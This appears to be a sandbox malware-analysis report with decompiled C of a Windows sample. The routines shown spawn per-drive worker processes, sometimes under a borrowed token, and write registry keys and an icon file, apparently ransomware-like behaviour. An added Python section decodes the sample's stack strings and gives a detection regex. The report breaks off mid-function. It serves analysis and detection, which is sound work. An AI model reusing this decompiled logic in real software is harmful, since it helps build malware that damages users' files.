                                                                                        • FindNextFileW.KERNEL32(000000FF,?), ref: 00406974
                                                                                        • FindClose.KERNEL32(000000FF), ref: 00406985
                                                                                          • Part of subcall function 004063FB: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,00000003), ref: 00406415
                                                                                          • Part of subcall function 004063FB: GetFileAttributesW.KERNEL32(00000000,?,?,?,00000003), ref: 0040641E
                                                                                          • Part of subcall function 004063FB: SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,00000003), ref: 0040642E
                                                                                          • Part of subcall function 004063FB: strlen.NTDLL ref: 0040649D
                                                                                          • Part of subcall function 004063FB: SetCurrentDirectoryW.KERNEL32(?,0040F610,?,00000000), ref: 004064BB
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004069B9
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004069D0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
• Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: FileHeap$Find$AttributesCurrentDirectoryFreewcslen$AllocateInfoNamedSecuritywcscatwcscpy$CloseEntriesExtensionFirstNextPath_wcsicmpstrlenwcsrchrwcsstr
                                                                                        • String ID: *
                                                                                        • API String ID: 4090008161-163128923
                                                                                        • Opcode ID: e14989edb91f7a36e79630f524d463a7723156a75bd546b4c07c7c80fbd5bede
                                                                                        • Instruction ID: b5e5f5ae924ab5d723afb11aecffd3da9daab4e8ff1d640df2b385bb3f7072ef
                                                                                        • Opcode Fuzzy Hash: e14989edb91f7a36e79630f524d463a7723156a75bd546b4c07c7c80fbd5bede
                                                                                        • Instruction Fuzzy Hash: A58149B1800209BAEF216F60ED09BAE7B75FB04305F054076F806715F1D77A4A69DB19
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 84%
                                                                                        			E00406EB7() {
                                                                                        				long _v8;
                                                                                        				void* _v12;
                                                                                        				void* _v16;
                                                                                        				void* _v20;
                                                                                        				char _v24;
                                                                                        				short _v544;
                                                                                        				char _t71;
                                                                                        				void* _t75;
                                                                                        				void* _t76;
                                                                                        				void* _t78;
                                                                                        				void* _t79;
                                                                                        				long _t82;
                                                                                        				signed int _t84;
                                                                                        				long _t85;
                                                                                        				void* _t94;
                                                                                        				void* _t95;
                                                                                        				WCHAR* _t96;
                                                                                        
                                                                                        				_v12 = 0;
                                                                                        				_v16 = 0;
                                                                                        				_v20 = 0;
                                                                                        				_v24 = E00406BF9();
                                                                                        				if(GetModuleFileNameW(0,  &_v544, 0x104) != 0) {
                                                                                        					_t82 = GetLogicalDriveStringsW(0, 0);
                                                                                        					if(_t82 != 0) {
                                                                                        						_v20 = RtlAllocateHeap( *0x40f5d6, 8, _t82 * 2);
                                                                                        						if(_v20 != 0) {
                                                                                        							_t84 = GetLogicalDriveStringsW(_t82, _v20) >> 2;
                                                                                        							_v16 = RtlAllocateHeap( *0x40f5d6, 8, _t84 * 4);
                                                                                        							if(_v16 != 0) {
                                                                                        								if( *0x40f5a5 == 0) {
                                                                                        									_v12 = 0;
                                                                                        									goto L13;
                                                                                        								} else {
                                                                                        									_t71 = RtlAllocateHeap( *0x40f5d6, 8, _t84 * 4);
                                                                                        									_v12 = _t71;
                                                                                        									if(_v12 != 0) {
                                                                                        										L13:
                                                                                        										_v8 = 0;
                                                                                        										_t96 = _v20;
                                                                                        										do {
                                                                                        											_t71 = GetDriveTypeW(_t96);
                                                                                        											if(_t71 == 3 || _t71 == 2 || _t71 == 4) {
                                                                                        												E00406C06(0,  &_v544, _t96, _v8, _v16, _v12);
                                                                                        												_v8 = _v8 + 1;
                                                                                        												_t71 = _v24;
                                                                                        												if(_v8 == _t71) {
                                                                                        													_t78 = WaitForMultipleObjects(_v8, _v16, 1, 0xffffffff);
                                                                                        													_push(_t96);
                                                                                        													if(_v12 != 0) {
                                                                                        														_push(_v8);
                                                                                        														do {
                                                                                        															asm("lodsd");
                                                                                        															_t95 = _t78;
                                                                                        															_t79 = MapViewOfFile(_t95, 0xf001f, 0, 0, 0x10);
                                                                                        															if(_t79 != 0) {
                                                                                        																 *0x40f638 =  *0x40f638 +  *_t79;
                                                                                        																 *0x40f644 =  *0x40f644 +  *((intOrPtr*)(_t79 + 4));
                                                                                        																 *0x40f63c =  *0x40f63c +  *((intOrPtr*)(_t79 + 8));
                                                                                        																asm("adc [0x40f640], ecx");
                                                                                        																UnmapViewOfFile(_t79);
                                                                                        															}
                                                                                        															_t78 = NtClose(_t95);
                                                                                        															_v8 = _v8 - 1;
                                                                                        														} while (_v8 != 0);
                                                                                        														_pop( *_t38);
                                                                                        													}
                                                                                        													do {
                                                                                        														asm("lodsd");
                                                                                        														_t78 = NtClose(_t78);
                                                                                        														_v8 = _v8 - 1;
                                                                                        													} while (_v8 != 0);
                                                                                        													_pop(_t96);
                                                                                        												}
                                                                                        											}
                                                                                        											_t96 =  &(_t96[4]);
                                                                                        											_t84 = _t84 - 1;
                                                                                        										} while (_t84 != 0);
                                                                                        										if(_v8 != 0) {
                                                                                        											/* block until every worker process handle gathered above has signalled (bWaitAll = 1, no timeout) */
                                                                                        											_t75 = WaitForMultipleObjects(_v8, _v16, 1, 0xffffffff);
                                                                                        											if(_v12 != 0) {
                                                                                        												_t85 = _v8;
                                                                                        												do {
                                                                                        													asm("lodsd");
                                                                                        													_t94 = _t75;
                                                                                        													/* 0xf001f = FILE_MAP_ALL_ACCESS; each worker section is the 0x10-byte mapping created in E00406C06 */
                                                                                        													_t76 = MapViewOfFile(_t94, 0xf001f, 0, 0, 0x10);
                                                                                        													if(_t76 != 0) {
                                                                                        														/* fold the per-worker counters into globals; the add at 0x40f63c plus the adc into 0x40f640 form one 64-bit sum */
                                                                                        														 *0x40f638 =  *0x40f638 +  *_t76;
                                                                                        														 *0x40f644 =  *0x40f644 +  *((intOrPtr*)(_t76 + 4));
                                                                                        														 *0x40f63c =  *0x40f63c +  *((intOrPtr*)(_t76 + 8));
                                                                                        														asm("adc [0x40f640], ecx");
                                                                                        														UnmapViewOfFile(_t76);
                                                                                        													}
                                                                                        													_t75 = NtClose(_t94);
                                                                                        													_t85 = _t85 - 1;
                                                                                        												} while (_t85 != 0);
                                                                                        											}
                                                                                        											/* second pass: close the worker process handles themselves */
                                                                                        											do {
                                                                                        												asm("lodsd");
                                                                                        												_t75 = NtClose(_t75);
                                                                                        												_v8 = _v8 - 1;
                                                                                        											} while (_v8 != 0);
                                                                                        										}
                                                                                        										}
                                                                                        									} else {
                                                                                        									}
                                                                                        								}
                                                                                        							} else {
                                                                                        							}
                                                                                        						} else {
                                                                                        						}
                                                                                        					} else {
                                                                                        					}
                                                                                        				} else {
                                                                                        				}
                                                                                        				if(_v20 != 0) {
                                                                                        					_t71 = RtlFreeHeap( *0x40f5d6, 0, _v20);
                                                                                        				}
                                                                                        				if(_v16 != 0) {
                                                                                        					_t71 = RtlFreeHeap( *0x40f5d6, 0, _v16);
                                                                                        				}
                                                                                        				if(_v12 != 0) {
                                                                                        					return RtlFreeHeap( *0x40f5d6, 0, _v12);
                                                                                        				}
                                                                                        				return _t71;
                                                                                        			}
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?,?,00000000), ref: 00406EF0
                                                                                        • GetLogicalDriveStringsW.KERNEL32(00000000,00000000,?,?,?,?,00000000), ref: 00406F03
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00407116
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 0040712D
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00407144
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: FreeHeap$DriveFileLogicalModuleNameStrings
                                                                                        • String ID:
                                                                                        • API String ID: 2101175942-0
                                                                                        • Opcode ID: 7c1ed1744f26a96ee03ef0cd4bf28a932c83e6c39daf279f305b0f73070da3cb
                                                                                        • Instruction ID: 643bebd2de4cfbeb964a38458f755a79d9fe05758559f9758bfbd7b921b65dbd
                                                                                        • Opcode Fuzzy Hash: 7c1ed1744f26a96ee03ef0cd4bf28a932c83e6c39daf279f305b0f73070da3cb
                                                                                        • Instruction Fuzzy Hash: 72815B30904208FFDB219F94ED48BAE77B5FB04315F10417AE501B66E1C7792E59DB4A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 79%
                                                                                        			E00406C06(void* _a4, wchar_t* _a8, wchar_t* _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                        				struct _STARTUPINFOW _v76;
                                                                                        				struct _PROCESS_INFORMATION _v92;
                                                                                        				char _v128;
                                                                                        				char _v196;
                                                                                        				short _v260;
                                                                                        				WCHAR* _v264;
                                                                                        				int _t76;
                                                                                        				char _t79;
                                                                                        				wchar_t* _t80;
                                                                                        				int _t89;
                                                                                        				intOrPtr* _t94;
                                                                                        				intOrPtr* _t108;
                                                                                        
                                                                                        				_t76 = wcslen(_a8);
                                                                                        				_t79 = RtlAllocateHeap( *0x40f5d6, 8, 0x46 + (_t76 + wcslen(_a12)) * 2);
                                                                                        				_v264 = _t79;
                                                                                        				if(_v264 != 0) {
                                                                                        					/* the drive path (_a12) is quoted in the command line only when it contains a space */
                                                                                        					_t80 = wcschr(_a12, 0x20);
                                                                                        					/* UTF-16 stack string, two code units per DWORD: "%s -work worker%d -path " followed by either "\"\\?\%s\"" or "\\?\%s" */
                                                                                        					_t108 =  &_v196;
                                                                                        					 *_t108 = 0x730025;
                                                                                        					 *((intOrPtr*)(_t108 + 4)) = 0x2d0020;
                                                                                        					 *((intOrPtr*)(_t108 + 8)) = 0x6f0077;
                                                                                        					 *((intOrPtr*)(_t108 + 0xc)) = 0x6b0072;
                                                                                        					 *((intOrPtr*)(_t108 + 0x10)) = 0x770020;
                                                                                        					 *((intOrPtr*)(_t108 + 0x14)) = 0x72006f;
                                                                                        					 *((intOrPtr*)(_t108 + 0x18)) = 0x65006b;
                                                                                        					 *((intOrPtr*)(_t108 + 0x1c)) = 0x250072;
                                                                                        					 *((intOrPtr*)(_t108 + 0x20)) = 0x200064;
                                                                                        					 *((intOrPtr*)(_t108 + 0x24)) = 0x70002d;
                                                                                        					 *((intOrPtr*)(_t108 + 0x28)) = 0x740061;
                                                                                        					 *((intOrPtr*)(_t108 + 0x2c)) = 0x200068;
                                                                                        					if(_t80 != 0) {
                                                                                        						/* "\"\\?\%s\"" */
                                                                                        						 *((intOrPtr*)(_t108 + 0x30)) = 0x5c0022;
                                                                                        						 *((intOrPtr*)(_t108 + 0x34)) = 0x3f005c;
                                                                                        						 *((intOrPtr*)(_t108 + 0x38)) = 0x25005c;
                                                                                        						 *(_t108 + 0x3c) = 0x220073;
                                                                                        						 *(_t108 + 0x40) = 0;
                                                                                        					} else {
                                                                                        						/* "\\?\%s" */
                                                                                        						 *((intOrPtr*)(_t108 + 0x30)) = 0x5c005c;
                                                                                        						 *((intOrPtr*)(_t108 + 0x34)) = 0x5c003f;
                                                                                        						 *((intOrPtr*)(_t108 + 0x38)) = 0x730025;
                                                                                        						 *(_t108 + 0x3c) = 0;
                                                                                        					}
                                                                                        					/* dynamically resolved wsprintfW-style formatter (assumed from the argument order): buffer, format, module path, worker index, drive path */
                                                                                        					 *0x40f69c(_v264,  &_v196, _a8, _a16, _a12);
                                                                                        					memset( &_v92, 0, 0x10);
                                                                                        					memset( &_v76, 0, 0x48);
                                                                                        					_v76.cb = 0x48;
                                                                                        					/* _a4 is an optional token; 0x80004 = EXTENDED_STARTUPINFO_PRESENT | CREATE_SUSPENDED, cb = 0x48 = sizeof(STARTUPINFOEXW) on x86 with a NULL attribute list */
                                                                                        					if(_a4 == 0) {
                                                                                        						_t89 = CreateProcessW(0, _v264, 0, 0, 1, 0x80004, 0, 0,  &_v76,  &_v92);
                                                                                        					} else {
                                                                                        						E00401AE1(_a4);
                                                                                        						if(E00401EBC() == 0) {
                                                                                        							/* nine-argument call through a resolved pointer; the shape (token, 2, NULL, cmdline, CREATE_SUSPENDED, ...) matches CreateProcessWithTokenW (not confirmed by the dump) */
                                                                                        							_t89 =  *0x40f820(_a4, 2, 0, _v264, 4, 0, 0,  &_v76,  &_v92);
                                                                                        						} else {
                                                                                        							_t89 = CreateProcessAsUserW(_a4, 0, _v264, 0, 0, 0, 0x80004, 0, 0,  &_v76,  &_v92);
                                                                                        						}
                                                                                        					}
                                                                                        					if(_t89 != 0) {
                                                                                        						if(_a24 != 0) {
                                                                                        							/* UTF-16 stack string "Local\worker%u-%u", formatted with the worker index and the child PID */
                                                                                        							_t94 =  &_v128;
                                                                                        							 *_t94 = 0x6f004c;
                                                                                        							 *((intOrPtr*)(_t94 + 4)) = 0x610063;
                                                                                        							 *((intOrPtr*)(_t94 + 8)) = 0x5c006c;
                                                                                        							 *((intOrPtr*)(_t94 + 0xc)) = 0x6f0077;
                                                                                        							 *((intOrPtr*)(_t94 + 0x10)) = 0x6b0072;
                                                                                        							 *((intOrPtr*)(_t94 + 0x14)) = 0x720065;
                                                                                        							 *((intOrPtr*)(_t94 + 0x18)) = 0x750025;
                                                                                        							 *((intOrPtr*)(_t94 + 0x1c)) = 0x25002d;
                                                                                        							 *((intOrPtr*)(_t94 + 0x20)) = 0x75;
                                                                                        							 *0x40f69c( &_v260,  &_v128, _a16, _v92.dwProcessId);
                                                                                        							/* pagefile-backed section (hFile = INVALID_HANDLE_VALUE), PAGE_READWRITE (4), 0x10 bytes; the parent later maps it to collect the worker's counters */
                                                                                        							 *((intOrPtr*)(_a16 * 4 + _a24)) = CreateFileMappingW(0xffffffff, 0, 4, 0, 0x10,  &_v260);
                                                                                        						}
                                                                                        						/* hand the process handle back to the caller's array, then start the suspended worker and drop the thread handle */
                                                                                        						 *(_a16 * 4 + _a20) = _v92.hProcess;
                                                                                        						ResumeThread(_v92.hThread);
                                                                                        						NtClose(_v92.hThread);
                                                                                        					}
                                                                                        					_t79 = RtlFreeHeap( *0x40f5d6, 0, _v264);
                                                                                        					if(_a4 != 0) {
                                                                                        						return E00401B60();
                                                                                        					}
                                                                                        				}
                                                                                        				return _t79;
                                                                                        			}
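The two decompiled routines above only make sense once their stack strings are read out: E00406C06 builds a per-drive worker command line, launches it suspended and creates a named 16-byte section, and the earlier fragment waits on those workers and sums the section contents. The following Python is an added example written for this page, not code from the sample or from the report. It decodes the DWORD immediates exactly as they appear in the decompilation, rebuilds the command line and section name with the same quoting rule, replays the counter accumulation (assuming the fourth DWORD is the high half consumed by the adc, which the decompiler does not show), and runs a regex derived from the fixed argument shape over constructed process-creation log lines. The log lines, paths and worker indices are made up for the example.

```python
import re
import struct

# DWORD immediates copied from the decompiled E00406C06: the function writes
# its format strings onto the stack four bytes at a time (two UTF-16LE code
# units per DWORD) instead of keeping them in .rdata.
CMDLINE_HEAD = [0x730025, 0x2d0020, 0x6f0077, 0x6b0072, 0x770020, 0x72006f,
                0x65006b, 0x250072, 0x200064, 0x70002d, 0x740061, 0x200068]
CMDLINE_TAIL_QUOTED = [0x5c0022, 0x3f005c, 0x25005c, 0x220073, 0x0]  # wcschr(path, ' ') != NULL
CMDLINE_TAIL_PLAIN = [0x5c005c, 0x5c003f, 0x730025, 0x0]            # no space in the path
SECTION_NAME_FMT = [0x6f004c, 0x610063, 0x5c006c, 0x6f0077, 0x6b0072, 0x720065,
                    0x750025, 0x25002d, 0x75]


def decode_stack_string(dwords):
    """Reassemble little-endian DWORD immediates into the UTF-16LE string they spell."""
    raw = b"".join(struct.pack("<I", d) for d in dwords)
    return raw.decode("utf-16-le").split("\x00", 1)[0]


def worker_cmdline(exe_path, worker_index, drive_path):
    """Command line the parent hands to each worker, with the sample's quoting rule."""
    tail = CMDLINE_TAIL_QUOTED if " " in drive_path else CMDLINE_TAIL_PLAIN
    template = decode_stack_string(CMDLINE_HEAD + tail)
    return template % (exe_path, worker_index, drive_path)


def section_name(worker_index, child_pid):
    """Name of the 16-byte section created per worker once CreateProcess succeeds."""
    return decode_stack_string(SECTION_NAME_FMT) % (worker_index, child_pid)


def aggregate_worker_sections(views):
    """Replay the parent's bookkeeping over the mapped 16-byte worker sections.

    Assumption (not visible in the decompilation): the fourth DWORD is the high
    half of the 64-bit counter that the adc at 0x40f640 completes.
    """
    total0 = total1 = total64 = 0
    for view in views:
        d0, d1, lo, hi = struct.unpack("<4I", view[:16])
        total0 = (total0 + d0) & 0xFFFFFFFF
        total1 = (total1 + d1) & 0xFFFFFFFF
        total64 = (total64 + ((hi << 32) | lo)) & 0xFFFFFFFFFFFFFFFF
    return total0, total1, total64


# Hunting: the " -work worker<n> -path \\?\" shape is fixed by the stack string,
# so it can be searched for in process-creation telemetry regardless of the
# image name the sample was dropped under.
WORKER_CMDLINE_RE = re.compile(r'\s-work\s+worker\d+\s+-path\s+"?\\\\\?\\', re.IGNORECASE)

# Constructed process-creation log lines for this example (not from the report).
SAMPLE_EVENTS = [
    r'EventID=1 Image=C:\Users\u\P3FwQWmwUM.exe CommandLine="C:\Users\u\P3FwQWmwUM.exe -work worker0 -path \\?\C:\"',
    r'EventID=1 Image=C:\Windows\System32\svchost.exe CommandLine="svchost.exe -k netsvcs"',
    r'EventID=1 Image=C:\tmp\x.exe CommandLine="C:\tmp\x.exe -work worker3 -path "\\?\D:\My Data\""',
]


def flag_worker_launches(events):
    """Return the events whose command line matches the worker launch pattern."""
    return [e for e in events if WORKER_CMDLINE_RE.search(e)]


if __name__ == "__main__":
    print(repr(decode_stack_string(CMDLINE_HEAD + CMDLINE_TAIL_PLAIN)))
    print(repr(decode_stack_string(SECTION_NAME_FMT)))
    print(worker_cmdline(r"C:\a.exe", 2, "D:\\My Data\\"))
    for hit in flag_worker_launches(SAMPLE_EVENTS):
        print("worker launch:", hit)
```

The decode step is the part worth keeping: any function in this binary that writes wide strings as DWORD immediates can be read the same way, and the fixed tokens it yields here (`-work worker`, `-path \\?\`, `Local\worker`) are the stable pieces to alert on, since the executable name is whatever the operator dropped.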
                                                                                        0x00406e1b
                                                                                        0x00406e22
                                                                                        0x00406e3a
                                                                                        0x00406e67
                                                                                        0x00406e67
                                                                                        0x00406e79
                                                                                        0x00406e7e
                                                                                        0x00406e87
                                                                                        0x00406e87
                                                                                        0x00406e9b
                                                                                        0x00406ea5
                                                                                        0x00000000
                                                                                        0x00406ea7
                                                                                        0x00406ea5
                                                                                        0x00406eb4

                                                                                        APIs
                                                                                        • wcslen.NTDLL ref: 00406C17
                                                                                        • wcslen.NTDLL ref: 00406C25
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00406C40
                                                                                        • wcschr.NTDLL ref: 00406C5E
                                                                                        • _swprintf.NTDLL ref: 00406D1B
                                                                                        • memset.NTDLL ref: 00406D2C
                                                                                        • memset.NTDLL ref: 00406D3D
                                                                                        • CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00080004,00000000,00000000,00000048,?,00000000), ref: 00406D86
                                                                                        • CreateProcessWithTokenW.ADVAPI32(00000000,00000002,00000000,?,00000004,00000000,00000000,00000048,?), ref: 00406DA9
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,00080004,00000000,00000000,00000048,?), ref: 00406DD0
                                                                                        • _swprintf.NTDLL ref: 00406E3A
                                                                                        • CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000010,?), ref: 00406E54
                                                                                        • ResumeThread.KERNEL32(?), ref: 00406E7E
                                                                                        • NtClose.NTDLL(?), ref: 00406E87
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 00406E9B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Create$Process$Heap_swprintfmemsetwcslen$AllocateCloseFileFreeMappingResumeThreadTokenUserWithwcschr
                                                                                        • String ID: H$ty@
                                                                                        • API String ID: 3330652022-1512611679
                                                                                        • Opcode ID: 221865317ba51a6fb8d9728862b77ebc403b43aab8f5ff42e48b7a266f4dd0a6
                                                                                        • Instruction ID: 57929b792f3314dfecdb3ad420f60d13cb815857ec55278c1469091712f12db6
                                                                                        • Opcode Fuzzy Hash: 221865317ba51a6fb8d9728862b77ebc403b43aab8f5ff42e48b7a266f4dd0a6
                                                                                        • Instruction Fuzzy Hash: 50814DB1500208EFEB209F90DD49F993BB5FF04709F204179E6056E1E2D7B6956ACF98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 94%
                                                                                        			E004039E3(void* __eflags, short* _a4) {
                                                                                        				void* _v8;
                                                                                        				short _v12;
                                                                                        				short _v76;
                                                                                        				long _v596;
                                                                                        				intOrPtr* _t38;
                                                                                        				signed int _t40;
                                                                                        				long _t48;
                                                                                        				signed int _t50;
                                                                                        				long _t71;
                                                                                        				wchar_t* _t72;
                                                                                        				short* _t73;
                                                                                        				void* _t74;
                                                                                        				void* _t75;
                                                                                        				void* _t76;
                                                                                        
                                                                                        				_v12 = 0;
                                                                                        				_t72 =  &_v596;
                                                                                        				 *0x40f8b8(0, _t72, 0x23, 0);
                                                                                        				E00401A3A(_t72);
                                                                                        				wcscat(_t72,  &(_a4[1]));
                                                                                        				_t38 = _t72 + wcslen(_t72) * 2;
                                                                                        				 *_t38 = 0x69002e;
                                                                                        				 *((intOrPtr*)(_t38 + 4)) = 0x6f0063;
                                                                                        				 *(_t38 + 8) = 0;
                                                                                        				_t75 = E00401D08(0x40d073);
                                                                                        				_t40 =  *0x40d06f; // 0x16b9
                                                                                        				_t74 = RtlAllocateHeap( *0x40f5d6, 0, _t40 * 8);
                                                                                        				E00401C9B(_t72, _t74, E0040A135(_t75, _t74));
                                                                                        				RtlFreeHeap( *0x40f5d6, 0, _t75);
                                                                                        				RtlFreeHeap( *0x40f5d6, 0, _t74);
                                                                                        				_t48 = RegCreateKeyExW(0x80000000, _a4, 0, 0, 0, 0x20106, 0,  &_v8, 0);
                                                                                        				if(_t48 == 0) {
                                                                                        					_t73 = _a4;
                                                                                        					_t13 =  &(_t73[1]); // 0x2
                                                                                        					_t50 = wcslen(_t13);
                                                                                        					_t16 =  &(_t73[1]); // 0x2
                                                                                        					RegSetValueExW(_v8,  &_v12, 0, 1, _t16, 2 + _t50 * 2);
                                                                                        					NtClose(_v8);
                                                                                        					_t20 =  &(_t73[1]); // 0x2
                                                                                        					wcscpy( &_v76, _t20);
                                                                                        					_t76 = E00401D08(0x40e730);
                                                                                        					wcscat( &_v76, _t76);
                                                                                        					RtlFreeHeap( *0x40f5d6, 0, _t76);
                                                                                        					_t48 = RegCreateKeyExW(0x80000000,  &_v76, 0, 0, 0, 0x20106, 0,  &_v8, 0);
                                                                                        					if(_t48 == 0) {
                                                                                        						RegSetValueExW(_v8,  &_v12, 0, 1,  &_v596, 2 + wcslen( &_v596) * 2);
                                                                                        						_t71 = NtClose(_v8);
                                                                                        						SHChangeNotify(0x8000000, 0x1000, 0, 0);
                                                                                        						return _t71;
                                                                                        					}
                                                                                        				}
                                                                                        				return _t48;
                                                                                        			}
                                                                                        0x004039f1
                                                                                        0x004039f8
                                                                                        0x00403a05
                                                                                        0x00403a0c
                                                                                        0x00403a19
                                                                                        0x00403a2c
                                                                                        0x00403a2f
                                                                                        0x00403a35
                                                                                        0x00403a3c
                                                                                        0x00403a4d
                                                                                        0x00403a4f
                                                                                        0x00403a6a
                                                                                        0x00403a76
                                                                                        0x00403a84
                                                                                        0x00403a93
                                                                                        0x00403ab4
                                                                                        0x00403abc
                                                                                        0x00403ac2
                                                                                        0x00403ac5
                                                                                        0x00403ac9
                                                                                        0x00403ada
                                                                                        0x00403ae9
                                                                                        0x00403af2
                                                                                        0x00403af8
                                                                                        0x00403b00
                                                                                        0x00403b13
                                                                                        0x00403b1a
                                                                                        0x00403b2c
                                                                                        0x00403b4e
                                                                                        0x00403b56
                                                                                        0x00403b82
                                                                                        0x00403b8b
                                                                                        0x00403b9f
                                                                                        0x00000000
                                                                                        0x00403b9f
                                                                                        0x00403b56
                                                                                        0x00403bad

                                                                                        APIs
                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000023,00000000,?,?,?,?,00000000), ref: 00403A05
                                                                                          • Part of subcall function 00401A3A: wcslen.NTDLL ref: 00401A49
                                                                                        • wcscat.NTDLL ref: 00403A19
                                                                                        • wcslen.NTDLL ref: 00403A23
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                        • RtlAllocateHeap.NTDLL(00000000,000016B9,0040D073), ref: 00403A64
                                                                                          • Part of subcall function 00401C9B: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?), ref: 00401CC2
                                                                                          • Part of subcall function 00401C9B: WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00401CE0
                                                                                          • Part of subcall function 00401C9B: NtClose.NTDLL(000000FF), ref: 00401CF4
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 00403A84
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00403A93
                                                                                        • RegCreateKeyExW.ADVAPI32(80000000,00000000,00000000,00000000,00000000,00020106,00000000,?,00000000,?,?,00000000), ref: 00403AB4
                                                                                        • wcslen.NTDLL ref: 00403AC9
                                                                                        • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000002,00000000,?,?,?,00000000), ref: 00403AE9
                                                                                        • NtClose.NTDLL(?), ref: 00403AF2
                                                                                        • wcscpy.NTDLL ref: 00403B00
                                                                                        • wcscat.NTDLL ref: 00403B1A
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00403B2C
                                                                                        • RegCreateKeyExW.ADVAPI32(80000000,?,00000000,00000000,00000000,00020106,00000000,?,00000000), ref: 00403B4E
                                                                                        • wcslen.NTDLL ref: 00403B5F
                                                                                        • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00403B82
                                                                                        • NtClose.NTDLL(?), ref: 00403B8B
                                                                                        • SHChangeNotify.SHELL32(08000000,00001000,00000000,00000000), ref: 00403B9F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$wcslen$CloseCreateFree$AllocateFileValuewcscat$ChangeFolderNotifyPathSpecialWritewcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 169162344-0
                                                                                        • Opcode ID: 73cdadbb1b0d1af14fff2fbc0bb64ca04801c088b04f352c93fb03f4e09c407c
                                                                                        • Instruction ID: 86e6b5c3c9ce88e8f5e0538f26e879c48f5b416ba6627b11c980b9c66a79cee5
                                                                                        • Opcode Fuzzy Hash: 73cdadbb1b0d1af14fff2fbc0bb64ca04801c088b04f352c93fb03f4e09c407c
                                                                                        • Instruction Fuzzy Hash: 36516F71540208BFE7209FA0ED4AFAA7B7CFB44705F100075F605FA0A1D771AA19CB69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 92%
                                                                                        			E00407B27(intOrPtr _a4) {
                                                                                        				long _v8;
                                                                                        				void* _v12;
                                                                                        				void* _v16;
                                                                                        				signed int _v20;
                                                                                        				char _v24;
                                                                                        				long _v28;
                                                                                        				intOrPtr _v32;
                                                                                        				void* _v36;
                                                                                        				short _v556;
                                                                                        				void* _t51;
                                                                                        				char _t53;
                                                                                        				void* _t63;
                                                                                        				int _t66;
                                                                                        				int _t67;
                                                                                        				void* _t77;
                                                                                        				wchar_t* _t80;
